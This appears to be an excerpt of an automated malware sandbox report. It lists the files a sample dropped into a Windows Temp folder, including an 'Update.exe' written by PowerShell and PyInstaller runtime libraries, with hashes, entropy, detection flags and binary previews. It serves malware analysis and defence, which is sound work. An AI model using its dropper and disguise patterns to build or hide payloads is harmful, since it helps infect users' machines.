                                  Preview:.2...2.,. ]!..5)!%k.HT.......u.......[".Q.0...rf....d.O.F..c.. .d0......g.w....I(..\..JtH.lW?...MY....@#dn.._..h...,;...%...6.g=..5.).20\&Qm..l..)..yL.....F...l..<.R[.R.~..%..C:.nkRK.O.H..f.`Z.W.2.. ^.q...1..(D...dO....J.....i?.b.Fa..f.....n.Sx.z.o....Ph..2....`.dy.)4/.S.wn...O......D....T5..K...........^..Pbh)...|[..........uv.L......,.........D.$......FJ.)|$.f...S,.LR.g.Ded.H9..N/[.....M8...p.W..4....=.!..y...{......-...N.&..@._.|.(..`3.....jB..5...*..j.@.l...D.=.W}z.E2...V..Z..y...'Br..v9l1=`.N..o[5;..:..L......2.......q>.g....@..n.5f./.!.rD..iN...=(.Q[.>+..P1......3...;j.......Lc...)Aym.3..l.V...,..).....&..S. .5.W[1.Q..pu..n.%.6.b....-+.1To..4n>..35r_"...}=~...!.)..m..h..=7...(2........M"&K.H.].......-..Z..h...}.....4|.;.{#.9..U..#..uA../>...XMM...#.E ....a1L.X..N.t.C.'.J50u...^%Od...q....Nk.....4g5.X...P...$......ZN....nM=.6..........81jm.46....n[.,.+..D. ./]v-.{.....a...>..k..EB........J^...$..........!..OPA....B...

                                  C:\Users\user\AppData\Local\Temp\Sustained

                                  Download File
                                  Process:C:\Users\user\Desktop\hfi47s4wOT.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):45056
                                  Entropy (8bit):4.9072371136194235
                                  Encrypted:false
                                  SSDEEP:384:h4aLWWZg319stEjFtr+/hdvE6HDyOpbM136KeBzC6GFe46JRoGWbHkdzfkfiCR:hGWZg3EYr8qcDP8WBosd0bHazf0J
                                  MD5:8962F2F60E9D27DB0667F87615C4A783
                                  SHA1:876251657E45258AA430A99E8C230E1717F27B8F
                                  SHA-256:E365E6606A38654B99F225C2C9D8FEE44B365E258B666DCCBBA2D8D4F9BFD01E
                                  SHA-512:0875B8055D386C6FE668C72F7D48F911CC8FF1EF5AAB7C12DD0F45CC112D8E882E44D036E556CFDCB96FC2757A96B4496FF239BBA705C7A11D901A6A6FF3F934
                                  Malicious:false
                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                  C:\Users\user\AppData\Local\Temp\Update.exe

                                  Download File
                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                  Category:dropped
                                  Size (bytes):86679705
                                  Entropy (8bit):7.990268298654722
                                  Encrypted:true
                                  SSDEEP:1572864:g1sJzj6zu2YLNmb+tDQ8H1S2DYqVWxQ9s+kYpSBkLDeyT2GVXOOAbN/01CppiIEk:krq5NSqVZVXFkYSBk1qoeLZ/7ptEk
                                  MD5:83D24C959DB31E8275643ED7DE230825
                                  SHA1:85FACE7BF96AA592BB6AF42A622EC7550867F00A
                                  SHA-256:F69DC72070DDA3260A892E1864DE015F09454DA9844A58839958FE973DF29550
                                  SHA-512:A1F6EE416860767F1C6EB1177B0E5DB8D0692AD6F8D71B4C8E244DF60C1874F58C716C30822D2B4361273D2A2868D3FCABF2E934BDC363E8810DF6D789E0E730
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 3%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Xhc.Xhc.Xhc...`._hc...f..hc...g.Rhc...[hc..`.Qhc..g.Ihc..f.phc...b.Shc.Xhb..hc.K.g.Ahc.K.a.Yhc.RichXhc.........PE..d...Bu.f.........."....(.....X.................@....................................z5+...`.................................................l...x............`..."..............h.......................................@...............P............................text............................... ..`.rdata..B&.......(..................@..@.data....s..........................@....pdata..."...`...$..................@..@.rsrc...............................@..@.reloc..h...........................@..B........................................................................................................................................................................................................................................................

                                  C:\Users\user\AppData\Local\Temp\Urw

                                  Download File
                                  Process:C:\Users\user\Desktop\hfi47s4wOT.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):60416
                                  Entropy (8bit):6.687539269978874
                                  Encrypted:false
                                  SSDEEP:1536:rYT5yXDlY9/UL4sgTNU+ufxv5iRhgt2F9m+qMHUPe3vK1:rCWlrss4M5iRq3U0Pe3vq
                                  MD5:28B2D9F3C8FC55272D467114050CEAE6
                                  SHA1:8A66F46082DB14FEB33636F9E38E4FCA6F85403C
                                  SHA-256:6A8583D05DDECFC10011C11B3C3224CC7A1326BF8CA8D9D42630F1CC7794D603
                                  SHA-512:22ACA7644ACC4B66EF5392BCF3F07181FCD8C59EF40C22870F94CA3933DDD5355349E62E6CDDD55E049EEB327931C6B2E77AA8AE429BA2F5FA785E3562D90DCC
                                  Malicious:false
                                  Preview:._.F.....^]...U......`.D$.V.u.WP.D$.PV..............L$..0)M..T$..L$........D)M..L$.....8.|$......................./............H....._........@...WQ.P....7..<.I..t$...D...d.....d...h.....h...l.....P...p....D$.;F.t.P.....3.@_^..]....L$..N...3...U..V.u.;5d)M.........D)M........t.Q......D)M..... ...P)M...D)M.;5T)M.u....|.....8.u.N...5T)M...H)M.^...v..D...8.t.]...I..H)M.j..4...o...D)M.YY..H)M..$....H)M....v..D)M...h)M....d)M...T...V..Np..B...NT......N$.....N.....h....V.n..YY..^...U..VW.}.........M...tF.E.S..t.;.....uH.^.....0.........;...@...........h....V.Cn...E.YY..t.[j.j..7..X.I._^].....u.........M...t...6..V..j..N..V..F..4...m...F.YY.N.^.$...SVW..j._..l................u.Nl......N(.....h....V.m..YY_..^[...U...u...(M..J....U...t...0)M.......y..u&...(M...u...M.........Qj..u...x.I.].....(M...U...u...(M........0)M.......q.P.....j..u.j..u...x.I.]...U..M....t.W.}.........._]...V..4.I...(M.P...........[...^...U......\SVW.u...(M..v.....0)M.......D$(P.\$..3........0.I........

                                  C:\Users\user\AppData\Local\Temp\Wallet

                                  Download File
                                  Process:C:\Users\user\Desktop\hfi47s4wOT.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):54272
                                  Entropy (8bit):6.711730821393445
                                  Encrypted:false
                                  SSDEEP:1536:SF7etdlf8rfKE5Km7wrH9rbjF4vvy1CTU:SF7etHufKE5Kmqd1UU
                                  MD5:846FBBA6E72DD96490A322025B9B0646
                                  SHA1:A638CE3967BE462803BCDDAFE9E07D7EB5C5063C
                                  SHA-256:45102B27DB69DCAD2AD6D1AE4D4962338DED07F0D8A77D835156F116BE1C7F4B
                                  SHA-512:7C52AA8BE1225256899D54F011E679F0926FC26DB97979DA76C6E51DE73CE9E02991FFE3F31069DEDC5265DFA1461BA67EA0FC4D55E155D15E44F79B4E5BF6A4
                                  Malicious:false
                                  Preview:d..^...^..t...]..l...............B.]..U..V.u.W.u..}.WV.7........u'NV....3.....+}...m......QWV............3.@_^]..U..SV.u.Wj.Y.F.....E.+.......u....I...+u.Y...j...s....}..+.^....m.......j..Y....l...|....t...k...|....t...j...|....u.........t....t.....u..C._^[]..U..V.u..u..u.V.V........u..F........F.^]..U..QQ.U.S...VW..Z........n..3...........e........g.........u.jbZRX..H...tJ..........E..H...................} ......$0f....P.u..u.j..A.P.n.......3....E..H.....[.....m.....O....} ......$0f....P.u..u.j..E..x.......$....x...........j0.u..u.j..p..p..p..........l...jd.Y..R.u...........a..................tD..........E..x.........x.........} .......0f......Q.u..u.j..p.......]..M ..h+J................}.3.VS.].WS.u.ja.u..X........u...#.........P...WShl%J..:...V.u.WS.u.jb.u..".....(..t.WShl%J......V.u.WS.u.je.u........(..t.WShl%J......V.u.WS.u.jT.u........(....z...WShl%J......V.u.WS.u.jY.u.......(....j....K...S.u.3....u.....u.P.u............&....u..u.hl%J..l...S.u..u..u.j..u.......$.

                                  C:\Users\user\AppData\Local\Temp\Wish

                                  Download File
                                  Process:C:\Users\user\Desktop\hfi47s4wOT.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):14336
                                  Entropy (8bit):6.574291079625107
                                  Encrypted:false
                                  SSDEEP:384:MwQMoHzM8/+laHxYkYpwMiVVn76VTBrg+8cm0hZZ:5oHzMSkCxZYa5ATBrJ8oX
                                  MD5:21871B349F4E7C6AEAD3E553969F20F3
                                  SHA1:B1D1AE168582E2CCE71770CB87A597C2BB2C0F93
                                  SHA-256:E70A1A118D281BD25CF5141F67042710F078A1EB20B7E99211B0C650F7BD2C49
                                  SHA-512:06A840BD402036C912C7069BA27D39D236C73165B315178A246CA128C335F13A876289B3D1082B4FBF1741CCF88D4FCCF1925D0DD849BAC864AF89B03A5BBEBC
                                  Malicious:false
                                  Preview:![f;.t.j<[f;.u"..B.j=Zf;.t.j!Zf;.u..E...........}......j.....]..f.G..u.X....E.3..]..E.jR.u....X.].f;.......j&Xf9F........U.F..E......f.G..u....j0Y.U.f;.r.j9Y.U.f;....).......f;....(...M(...j..Y.Y.....x(....E..p..u........f;.w0......j.Y.U...t..r..u.........u.f;.h...v.M.+M.3.E,.U.....j....M.X..]............w..u...]..f;........E..q........e)..j<Xf;.u.j>X....E.u......j'Xf;.t.j-3.X.}.f;.t(j+Xf;.t ..f;.p.........j9Xf;........}.......M.u......j0Yf;.r;..j9Xf;.w1........n'..k.........j0.u..........Yf;.s....].f...w.j)Z.u...f;...1....},........M..xQ....M'....t..E(j-Z.@@;.u.+.X........*(...M(;YD...(...U.f.Z..u.;YL.......YL.....U(3.]...B,.E.9J0~>.M..P.S.....Y..u..E.3.f9LX.u..U(...U(G.M..B4..A...M.;z0|.3.u.;z0...........u.G..M.].;BL~..BL;z0}:.].M..B4S..A.M..Q..M.....Y..u..M.f9DY.u..U(FG;z0|.].M.U.;u.~..].Cf.r.f.B.........].f.B......}.....'...E.jRZf9.ue.U...~=j0_...Pf;....&..f;.L......&...........&..k.......E.B;.|..u.......U......f.J..M(f.B..u..h.........&..S

                                  C:\Users\user\AppData\Local\Temp\Yoga

                                  Download File
                                  Process:C:\Users\user\Desktop\hfi47s4wOT.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):198656
                                  Entropy (8bit):7.9990302654534835
                                  Encrypted:true
                                  SSDEEP:6144:/nqejdlyHDXjevm/I/P2sEW1y9Rm36vz79b:CeTyjXjee/ItEE+ma
                                  MD5:3EFE3FB345BC5B011F8CB8A0C07DAA95
                                  SHA1:4A93A68AB3D42A7EC78152CEA8434D17CE8A9F98
                                  SHA-256:2BBD903F61544E1F35BFE44C2CDC57203847AC57263FFEB24820E4D398D57B77
                                  SHA-512:5D8F2365E2ABB6514F8671436254C027162115923842D3FC40D408CCCB92B50006B541567A389FB1B37741D8672D338FD763280A41D7BC3F0860DBA75C9EBD02
                                  Malicious:false
                                  Preview:...;O...x5...V.{..7.(.....`<...!.N.m=.yO.....J.S....f....f.C\....e....F..;y.B..k.*.-*.a..M.Z5..n.@.N..u..+.......s{.....qx.oM.Ho....n...y...N.Z98u^.......zX.....-H.uW[.!...L...6.*...y/.....rKw...-...#..j..h.:Q..j..4....R.3.T.n....$.=..*.P..e.Y...y..D..p....hI.C.Eu....kH.......v.s.p....E...;._>..b....kq..........X.......#..J.X7.....*$.s.~.h......(@...~J]..W0+......5(b.ry..X...y.Q.@......7~.."...Z.g.2#.-X/..........MI8..;.y.6.....-..(..........=.../.[...=..u......9Q$.4...r:.cR.../.......P...T......4.+z,.A.U."..K....Y:.:...?.5..Np(...8...mU..a.]WCCf&.j...Y."....^.6.....R\.S.q...NC.Jy&.Z.....7Z:..&...n.\..Vx..a.u..X.5N.5..7....o./..y...'.4..2+4^o..<.`.Ser$\,].x....q..{.K.....}O..Q....g.U.....$.lk_?.QU.....H.....&v....^;.....tOq.................WO{e......o.F.#w..F.*.V50..z....4v.!$...v..J.f.g.P.....E5|.........S.CXw.._.Z....FO..'..............3m. .Z..G..S4Vn+..t.7u...C=A..Bs........4.3.x.W.j......LBV...S|...C...L....Q.e[.... .T.7.7h.lG.8.K

                                  C:\Users\user\AppData\Local\Temp\_MEI57242\VCRUNTIME140.dll

                                  Download File
                                  Process:C:\Users\user\AppData\Local\Temp\Update.exe
                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                  Category:dropped
                                  Size (bytes):119192
                                  Entropy (8bit):6.6016214745004635
                                  Encrypted:false
                                  SSDEEP:1536:+qvQ1Dj2DkX7OcujarvmdlYNABCmgrP4ddbkZIecbWcFML/UXzlghzdMFw84hzk:+qvQ1D2CreiABCmgYecbWVLUD6h+b4ho
                                  MD5:BE8DBE2DC77EBE7F88F910C61AEC691A
                                  SHA1:A19F08BB2B1C1DE5BB61DAF9F2304531321E0E40
                                  SHA-256:4D292623516F65C80482081E62D5DADB759DC16E851DE5DB24C3CBB57B87DB83
                                  SHA-512:0DA644472B374F1DA449A06623983D0477405B5229E386ACCADB154B43B8B083EE89F07C3F04D2C0C7501EAD99AD95AECAA5873FF34C5EEB833285B598D5A655
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........N.../c../c../c._]b./c..W.../c../b./c../c../c...`./c...g./c...f./c...c./c....../c...a./c.Rich./c.........................PE..d.....cW.........." ...&. ...d......................................................-.....`A.........................................e..4...4m...........................O...........N..p............................L..@............0...............................text...&........................... ..`fothk........ ...................... ..`.rdata..\C...0...D...$..............@..@.data...p............h..............@....pdata...............l..............@..@_RDATA...............x..............@..@.rsrc................z..............@..@.reloc...............~..............@..B................................................................................................................................................................

                                  C:\Users\user\AppData\Local\Temp\_MEI57242\_bz2.pyd

                                  Download File
                                  Process:C:\Users\user\AppData\Local\Temp\Update.exe
                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                  Category:dropped
                                  Size (bytes):85272
                                  Entropy (8bit):6.593462846910602
                                  Encrypted:false
                                  SSDEEP:1536:i2sz7yc51BVo1QX/FPI11IK1cDm015ssO687sjkD1ISCV087Syyxt+:dsz2c5eQXB4am05spd7MkD1ISCVzL
                                  MD5:5BEBC32957922FE20E927D5C4637F100
                                  SHA1:A94EA93EE3C3D154F4F90B5C2FE072CC273376B3
                                  SHA-256:3ED0E5058D370FB14AA5469D81F96C5685559C054917C7280DD4125F21D25F62
                                  SHA-512:AFBE80A73EE9BD63D9FFA4628273019400A75F75454667440F43BEB253091584BF9128CBB78AE7B659CE67A5FAEFDBA726EDB37987A4FE92F082D009D523D5D6
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................b......................................................................................Rich...................PE..d.....bf.........." ...(.....^...............................................`......P.....`.........................................p...H............@.......0..D......../...P..........T...........................p...@............................................text.../........................... ..`.rdata..P>.......@..................@..@.data........ ......................@....pdata..D....0......................@..@.rsrc........@......................@..@.reloc.......P......................@..B................................................................................................................................................................................................................................

                                  C:\Users\user\AppData\Local\Temp\_MEI57242\_cffi_backend.cp312-win_amd64.pyd

                                  Download File
                                  Process:C:\Users\user\AppData\Local\Temp\Update.exe
                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                  Category:dropped
                                  Size (bytes):182784
                                  Entropy (8bit):6.193615170968096
                                  Encrypted:false
                                  SSDEEP:3072:YRAMUp3K6YoDssyudy4VcRG+nR3hnW3mjwwOdkS9S7iSSTLkK/jftw3buz:Y6MyK65ssy+MG+LnSUwjD9zSSTLL/jl8
                                  MD5:0572B13646141D0B1A5718E35549577C
                                  SHA1:EEB40363C1F456C1C612D3C7E4923210EAE4CDF7
                                  SHA-256:D8A76D1E31BBD62A482DEA9115FC1A109CB39AF4CF6D1323409175F3C93113A7
                                  SHA-512:67C28432CA8B389ACC26E47EB8C4977FDDD4AF9214819F89DF07FECBC8ED750D5F35807A1B195508DD1D77E2A7A9D7265049DCFBFE7665A7FD1BA45DA1E4E842
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........(...I.C.I.C.I.C.1MC.I.C.<.B.I.C.&#C.I.C.<.B.I.C.<.B.I.C.<.B.I.C.1.B.I.C.4.B.I.C.I.C I.C.<.B.I.C.1KC.I.C.<.B.I.C.<!C.I.C.<.B.I.CRich.I.C................PE..d...g..e.........." .........@......`........................................@............`..........................................w..l....w....... ..........l............0.......]...............................]..8............................................text............................... ..`.rdata..............................@..@.data...h].......0...|..............@....pdata..l...........................@..@.rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................

                                  C:\Users\user\AppData\Local\Temp\_MEI57242\_decimal.pyd

                                  Download File
                                  Process:C:\Users\user\AppData\Local\Temp\Update.exe
                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                  Category:dropped
                                  Size (bytes):257304
                                  Entropy (8bit):6.565489271518002
                                  Encrypted:false
                                  SSDEEP:6144:vnXBJvhy8AJOMg4hmRWw710z4ez9qWM53pLW1AW/ZJJJWtCk1mGc:ByJJOMiRW+10EHFpNc
                                  MD5:492C0C36D8ED1B6CA2117869A09214DA
                                  SHA1:B741CAE3E2C9954E726890292FA35034509EF0F6
                                  SHA-256:B8221D1C9E2C892DD6227A6042D1E49200CD5CB82ADBD998E4A77F4EE0E9ABF1
                                  SHA-512:B8F1C64AD94DB0252D96082E73A8632412D1D73FB8095541EE423DF6F00BC417A2B42C76F15D7E014E27BAAE0EF50311C3F768B1560DB005A522373F442E4BE0
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........V.............. .....G&......G&......G&......G&.......!......................!.......!.......!.......!L......!......Rich............PE..d.....bf.........." ...(.....<............................................................`..........................................c..P....c...................&......./......T.......T...........................p...@............................................text...I........................... ..`.rdata..(...........................@..@.data...X*.......$...b..............@....pdata...&.......(..................@..@.rsrc...............................@..@.reloc..T...........................@..B........................................................................................................................................................................................................................................

                                  C:\Users\user\AppData\Local\Temp\_MEI57242\_hashlib.pyd

                                  Download File
                                  Process:C:\Users\user\AppData\Local\Temp\Update.exe
                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                  Category:dropped
                                  Size (bytes):66328
                                  Entropy (8bit):6.2279606895285875
                                  Encrypted:false
                                  SSDEEP:1536:JgHpgE4Z27b4ZWZnEmIAtISOIx7SyZUxN:i14ZeEmIAtISOIx7+
                                  MD5:DA02CEFD8151ECB83F697E3BD5280775
                                  SHA1:1C5D0437EB7E87842FDE55241A5F0CA7F0FC25E7
                                  SHA-256:FD77A5756A17EC0788989F73222B0E7334DD4494B8C8647B43FE554CF3CFB354
                                  SHA-512:A13BC5C481730F48808905F872D92CB8729CC52CFB4D5345153CE361E7D6586603A58B964A1EBFD77DD6222B074E5DCCA176EAAEFECC39F75496B1F8387A2283
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........N@.. ... ... ...... ..k!... ..k#... ..k$... ..k%... ..l!... ...!... ..h!... ...!.A. ..l-... ..l ... ..l.... ..l"... .Rich.. .........................PE..d.....bf.........." ...(.V.......... @...............................................G....`.........................................p...P................................/......X...@}..T............................|..@............p..(............................text....T.......V.................. ..`.rdata...O...p...P...Z..............@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..X...........................@..B........................................................................................................................................................................................................................

                                  C:\Users\user\AppData\Local\Temp\_MEI57242\_lzma.pyd

                                  Download File
                                  Process:C:\Users\user\AppData\Local\Temp\Update.exe
                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                  Category:dropped
                                  Size (bytes):160024
                                  Entropy (8bit):6.854257867628366
                                  Encrypted:false
                                  SSDEEP:3072:Bsvkxuqgo7e2uONqG+hi+CSznfF9mNopXnmnu1ISZ1Vk:BnuFo7Jg1NYOp2uO
                                  MD5:195DEFE58A7549117E06A57029079702
                                  SHA1:3795B02803CA37F399D8883D30C0AA38AD77B5F2
                                  SHA-256:7BF9FF61BABEBD90C499A8ED9B62141F947F90D87E0BBD41A12E99D20E06954A
                                  SHA-512:C47A9B1066DD9744C51ED80215BD9645AAB6CC9D6A3F9DF99F618E3DD784F6C7CE6F53EABE222CF134EE649250834193D5973E6E88F8A93151886537C62E2E2B
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......hD..,%.X,%.X,%.X%]7X(%.X.Y.%.X.Y/%.X.Y$%.X.Y %.X?..Y/%.Xg].Y.%.X,%.XI%.X?..Y.%.X?..Y-%.X?.[X-%.X?..Y-%.XRich,%.X........PE..d.....bf.........." ...(.f..........`8....................................................`......................................... %..L...l%..x....p.......P.......B.../......4.......T...............................@............................................text...be.......f.................. ..`.rdata..............j..............@..@.data...p....@......................@....pdata.......P......."..............@..@.rsrc........p.......6..............@..@.reloc..4............@..............@..B................................................................................................................................................................................................................................................

                                  C:\Users\user\AppData\Local\Temp\_MEI57242\_socket.pyd

                                  Download File
                                  Process:C:\Users\user\AppData\Local\Temp\Update.exe
                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                  Category:dropped
                                  Size (bytes):83736
                                  Entropy (8bit):6.32286800032437
                                  Encrypted:false
                                  SSDEEP:1536:ldcydNgIznrvGvLfo4o7zfqwXJ9/s+S+pzo08/n1IsJhv6cpISLwV97Sy7UxV:l6ydrr+DgxjqwXJ9/sT+pzoN1IwhScpf
                                  MD5:DD8FF2A3946B8E77264E3F0011D27704
                                  SHA1:A2D84CFC4D6410B80EEA4B25E8EFC08498F78990
                                  SHA-256:B102522C23DAC2332511EB3502466CAF842D6BCD092FBC276B7B55E9CC01B085
                                  SHA-512:958224A974A3449BCFB97FAAB70C0A5B594FA130ADC0C83B4E15BDD7AAB366B58D94A4A9016CB662329EA47558645ACD0E0CC6DF54F12A81AC13A6EC0C895CD8
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......../...Nb}.Nb}.Nb}.6.}.Nb}O.c|.Nb}O.a|.Nb}O.f|.Nb}O.g|.Nb}..c|.Nb}.Nc}4Nb}.6c|.Nb}..o|.Nb}..b|.Nb}..}.Nb}..`|.Nb}Rich.Nb}........PE..d.....bf.........." ...(.x..........`-.......................................`...........`.............................................P............@.......0.........../...P..........T...............................@............................................text....v.......x.................. ..`.rdata...x.......z...|..............@..@.data...............................@....pdata.......0......................@..@.rsrc........@......................@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................

                                  C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-core-console-l1-1-0.dll

                                  Download File
                                  Process:C:\Users\user\AppData\Local\Temp\Update.exe
                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                  Category:dropped
                                  Size (bytes):13736
                                  Entropy (8bit):6.830867642122176
                                  Encrypted:false
                                  SSDEEP:192:WfBWfhWooeWvcuyjS7HnhWgN7a8WhlZGh+Il+jX01k9z3ARCvXD8N:W5WfhWd7HRN7sOEjR9zSSG
                                  MD5:71405F0BA5D7DA5A5F915F33667786DE
                                  SHA1:BB5CDF9C12FE500251CF98F0970A47B78C2F8B52
                                  SHA-256:0099F17128D1551A47CBD39CE702D4ACC4B49BE1BB1CFE974FE5A42DA01D88EB
                                  SHA-512:B2C6438541C4FA7AF3F8A9606F64EEEF5D77DDBC0689E7501074BB72B7CC907A8461A75089E5B70B881BC3B1BE009888FF25EA866FAAF1C49DD521027041295A
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d................" .........................................................0......c.....`.........................................`...,............ ...................'..............T............................................................................rdata..,...........................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                  C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-core-datetime-l1-1-0.dll

                                  Download File
                                  Process:C:\Users\user\AppData\Local\Temp\Update.exe
                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                  Category:dropped
                                  Size (bytes):13224
                                  Entropy (8bit):6.838675218358012
                                  Encrypted:false
                                  SSDEEP:192:WTWfhWKkeWvcuyjS7HnhWgN7a8WhaYah+Il+jX01k9z3ARiuXLL1w:WTWfhWN7HRN7ISEjR9zS/f2
                                  MD5:A17D27E01478C17B88794FD0F79782FC
                                  SHA1:2B8393E7B37FB990BE2CDC82803CA49B4CEF8546
                                  SHA-256:AC227773908836D54C8FC06C4B115F3BDFC82E4D63C7F84E1F8E6E70CD066339
                                  SHA-512:DDC6DDA49D588F22C934026F55914B31E53079E044DEC7B4F1409668DBFE8885B887CC64A411D44F83BC670AC8A8B6D3AD030D4774EF7BF522F1D3BC00E07485
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d....o*..........." .........................................................0...........`.........................................`................ ...................'..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                  C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-core-debug-l1-1-0.dll

                                  Download File
                                  Process:C:\Users\user\AppData\Local\Temp\Update.exe
                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                  Category:dropped
                                  Size (bytes):13224
                                  Entropy (8bit):6.843944025237199
                                  Encrypted:false
                                  SSDEEP:192:W/WfhWJeWvcuyjS7HnhWgN7a8WhpaWGaN4NhrJgX01k9z3An9PLLIh:W/WfhWJ7HRN7svTN4tgR9zYxi
                                  MD5:E485C1C5F33AD10EEC96E2CDBDDFF3C7
                                  SHA1:31F6BA9BECA535F2FB7FFB755B7C5C87AC8D226C
                                  SHA-256:C734022B165B3BA6F8E28670C4190A65C66EC7ECC961811A6BDCD9C7745CAC20
                                  SHA-512:599036D8FA2E916491BEDB5BB49B94458A09DDDD2908CF770E94BB0059730598EC5A9B0507E6A21209E2DCAE4D74027313DF87C9AB51FAD66B1D07903BAE0B35
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d....r.r.........." .........................................................0......y.....`.........................................`................ ...................'..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                  C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-core-errorhandling-l1-1-0.dll

                                  Download File
                                  Process:C:\Users\user\AppData\Local\Temp\Update.exe
                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                  Category:dropped
                                  Size (bytes):13224
                                  Entropy (8bit):6.890661662475156
                                  Encrypted:false
                                  SSDEEP:192:WgmxD3JbDWfhWqjeWvcuyjS7HnhWgN7aUWh1kG1q21eX01k9z3ABfNBnJbIx:WgAbDWfhWo7HRN74l1l8R9zmfNBlg
                                  MD5:0FFB34C0C2CDEC47E063C5E0C96B9C3F
                                  SHA1:9716643F727149B953F64B3E1EB6A9F2013EAC9C
                                  SHA-256:863A07D702717CF818A842AF0B4E1DFD6E723F712E49BF8C3AF3589434A0AE80
                                  SHA-512:4311D582856D9C3CAC2CDC6A9DA2137DF913BCF69041015FD272C2780F6AB850895DEB69279A076376A2E6401C907CB23A3052960478A6CF4B566A20CCE61BD1
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d...Mz............" .........................................................0......h.....`.........................................`................ ...................'..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                  C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-core-file-l1-1-0.dll

                                  Download File
                                  Process:C:\Users\user\AppData\Local\Temp\Update.exe
                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                  Category:dropped
                                  Size (bytes):16808
                                  Entropy (8bit):6.765025764551782
                                  Encrypted:false
                                  SSDEEP:192:W/IAuVYPvVX8rFTs0WfhWueWvcuyjS7HnhWgN7a8Whiah+Il+jX01k9z3AR0Xik3:WVBPvVXuWfhWI7HRN7mEjR9zS0PP
                                  MD5:792C2B83BC4E0272785AA4F5F252FF07
                                  SHA1:6868B82DF48E2315E6235989185C8E13D039A87B
                                  SHA-256:D26D433F86223B10CCC55837C3E587FA374CD81EFC24B6959435A6770ADDBF24
                                  SHA-512:72C99CFF7FD5A762524E19ABEE5729DC8857F3EE3C8F78587625EC74F2AD96AF7DEE03ABA54B441CDA44B04721706BED70F3AD88453A341CBB51AAC9AFD9559E
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
